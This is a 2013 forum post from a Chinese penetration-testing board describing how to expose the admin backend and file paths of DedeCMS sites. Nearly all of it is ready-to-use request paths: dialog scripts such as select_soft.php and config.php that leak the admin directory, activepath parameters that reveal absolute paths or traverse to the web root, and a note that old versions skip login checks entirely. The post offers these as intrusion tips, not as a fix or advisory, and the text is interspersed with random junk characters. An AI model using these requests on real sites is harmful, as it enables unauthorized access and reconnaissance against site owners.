找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2143|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
( R2 e7 ^6 g5 D- A# Q. _) \$ b  X+ t
员帐号,新版本的就直接转向了后台.
7 H. R6 B! s3 w. B8 L# [  B8 z0 L* h9 g/ y8 M: R
2.include/dialog/config.php会爆出后台管理路径8 M  ]: d, O$ n+ q+ q$ _/ u7 Z

" K* e9 T' D, `4 C& l+ y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
! T2 l  z% C% t; o+ B! j% I, o
5 `7 I( `' c6 k4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.! X) S! M6 m' z8 J' f
8 F3 B6 Y' ^9 x; d6 z, G
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉0 U! ~( Z" h3 h# O1 ^( x
( r* }* a* f0 J$ T, a6 @  Y& z
到根目录去.不过这些版本的访问地址有些不同.+ p5 X5 U8 w5 G4 ?: w3 j
地址为require/dialog/select_soft.php?activepath=/././././././././! a& }3 M. P1 B
  `. `1 R  A: Y, B  h9 t
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
" W0 @% \4 {; s9 e存在相同问题的文件还有
5 c# I; O* c$ S0 Winclude\dialog\select_images.php3 E$ x$ \2 I$ L
include\dialog\select_media.php
) Q1 P; o5 t0 [$ S9 finclude\dialog\select_templets.php​1 K  r; B, A( S( n7 x) _
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表